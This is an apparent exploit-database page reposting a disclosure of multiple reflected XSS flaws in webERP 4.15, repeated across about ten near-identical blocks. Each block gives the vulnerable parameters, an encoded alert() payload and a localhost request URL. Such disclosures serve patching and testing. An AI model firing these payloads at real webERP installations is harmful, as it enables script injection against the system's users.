webERP 4.15 - nsextt Multiple XSS Injection

2019.04.15
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=========================================================================================== # Exploit Title: webERP 4.15 - nsextt XSS Injection # CVE: N/A # Date: 28/02/2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.weberp.org/ # Software Link: https://sourceforge.net/projects/web-erp/ # Version: v4.15 # Category: Webapps # Tested on: Wamp64, @Win # Software description: webERP is a free open-source ERP system, providing best practise, multi-user business administration and accounting tools over the web. =========================================================================================== # POC - XSS # Parameters : nsextt # Attack Pattern : %2522%252balert(0x004B53)%252b%2522 # GET Request : http://localhost/webERP/webERP/AgedDebtors.php?nsextt=%22%2balert(0x004B53)%2b%22 =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: webERP 4.15 - nsextt XSS Injection # CVE: N/A # Date: 28/02/2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.weberp.org/ # Software Link: https://sourceforge.net/projects/web-erp/ # Version: v4.15 # Category: Webapps # Tested on: Wamp64, @Win # Software description: webERP is a free open-source ERP system, providing best practise, multi-user business administration and accounting tools over the web. =========================================================================================== # POC - XSS # Parameters : nsextt # Attack Pattern : %2522%252balert(0x00490C)%252b%2522 # GET Request : http://localhost/webERP/webERP/CustomerAllocations.php?nsextt=%22%2balert(0x00490C)%2b%22 =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: webERP 4.15 - nsextt XSS Injection # CVE: N/A # Date: 28/02/2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.weberp.org/ # Software Link: https://sourceforge.net/projects/web-erp/ # Version: v4.15 # Category: Webapps # Tested on: Wamp64, @Win # Software description: webERP is a free open-source ERP system, providing best practise, multi-user business administration and accounting tools over the web. =========================================================================================== # POC - XSS # Parameters : nsextt # Attack Pattern : %2522%252balert(0x004F06)%252b%2522 # GET Request : http://localhost/webERP/webERP/CustomerBalancesMovement.php?nsextt=%22%2balert(0x004F06)%2b%22 =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: webERP 4.15 - Multiple XSS Injection # CVE: N/A # Date: 28/02/2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.weberp.org/ # Software Link: https://sourceforge.net/projects/web-erp/ # Version: v4.15 # Category: Webapps # Tested on: Wamp64, @Win # Software description: webERP is a free open-source ERP system, providing best practise, multi-user business administration and accounting tools over the web. =========================================================================================== # POC - XSS # Parameters : NewReceipt,nsextt,Type,nsparamname # Attack Pattern : %27%2balert(0x0047E5)%2b%27 # GET Request : http://localhost/webERP/webERP/CustomerReceipt.php?NewReceipt='+alert(0x0047E5)+'&Type=Customer =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: webERP 4.15 - nsextt XSS Injection # CVE: N/A # Date: 28/02/2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.weberp.org/ # Software Link: https://sourceforge.net/projects/web-erp/ # Version: v4.15 # Category: Webapps # Tested on: Wamp64, @Win # Software description: webERP is a free open-source ERP system, providing best practise, multi-user business administration and accounting tools over the web. =========================================================================================== # POC - XSS # Parameters : nsextt # Attack Pattern : %2522%252balert(0x0049AA)%252b%2522 # GET Request : http://localhost/webERP/webERP/CustWhereAlloc.php?nsextt=%22%2balert(0x0049AA)%2b%22 =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: webERP 4.15 - Multiple XSS Injection # CVE: N/A # Date: 28/02/2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.weberp.org/ # Software Link: https://sourceforge.net/projects/web-erp/ # Version: v4.15 # Category: Webapps # Tested on: Wamp64, @Win # Software description: webERP is a free open-source ERP system, providing best practise, multi-user business administration and accounting tools over the web. =========================================================================================== # POC - XSS # Parameters : FormID,AddToMenu,ScriptName,Title # Attack Pattern : %27%2balert(0x003279)%2b%27 # POST Request : http://localhost/webERP/webERP/Dashboard.php =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: webERP 4.15 - nsextt XSS Injection # CVE: N/A # Date: 28/02/2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.weberp.org/ # Software Link: https://sourceforge.net/projects/web-erp/ # Version: v4.15 # Category: Webapps # Tested on: Wamp64, @Win # Software description: webERP is a free open-source ERP system, providing best practise, multi-user business administration and accounting tools over the web. =========================================================================================== # POC - XSS # Parameters : nsextt # Attack Pattern : %2522%252balert(0x004C8E)%252b%2522 # GET Request : http://localhost/webERP/webERP/DebtorsAtPeriodEnd.php?nsextt=%22%2balert(0x004C8E)%2b%22 =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: webERP 4.15 - nsextt XSS Injection # CVE: N/A # Date: 28/02/2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.weberp.org/ # Software Link: https://sourceforge.net/projects/web-erp/ # Version: v4.15 # Category: Webapps # Tested on: Wamp64, @Win # Software description: webERP is a free open-source ERP system, providing best practise, multi-user business administration and accounting tools over the web. =========================================================================================== # POC - XSS # Parameters : nsextt # Attack Pattern : %2522%252balert(0x004BF0)%252b%2522 # GET Request : http://localhost/webERP/webERP/PDFBankingSummary.php?nsextt=%22%2balert(0x004BF0)%2b%22 =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: webERP 4.15 - Multiple XSS Injection # CVE: N/A # Date: 28/02/2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.weberp.org/ # Software Link: https://sourceforge.net/projects/web-erp/ # Version: v4.15 # Category: Webapps # Tested on: Wamp64, @Win # Software description: webERP is a free open-source ERP system, providing best practise, multi-user business administration and accounting tools over the web. =========================================================================================== # POC - XSS # Parameters : nsextt,NewCredit,nsparamname # Attack Pattern : %27%2balert(0x003279)%2b%27 # GET Request : http://localhost/webERP/webERP/SelectCreditItems.php?NewCredit=Yes&nsextt=%22%2balert(0x0046E2)%2b%22 =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: webERP 4.15 - Multiple XSS Injection # CVE: N/A # Date: 28/02/2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://www.weberp.org/ # Software Link: https://sourceforge.net/projects/web-erp/ # Version: v4.15 # Category: Webapps # Tested on: Wamp64, @Win # Software description: webERP is a free open-source ERP system, providing best practise, multi-user business administration and accounting tools over the web. =========================================================================================== # POC - XSS # Parameters : nsextt,StockCat,FormID,Keywords,SupplierStockCode,ScriptName,StockCode,AddToMenu,Search,Title # Attack Pattern : %27%2balert(0x0035E4)%2b%27 # GET Request : http://localhost/webERP/webERP/SelectProduct.php ===========================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top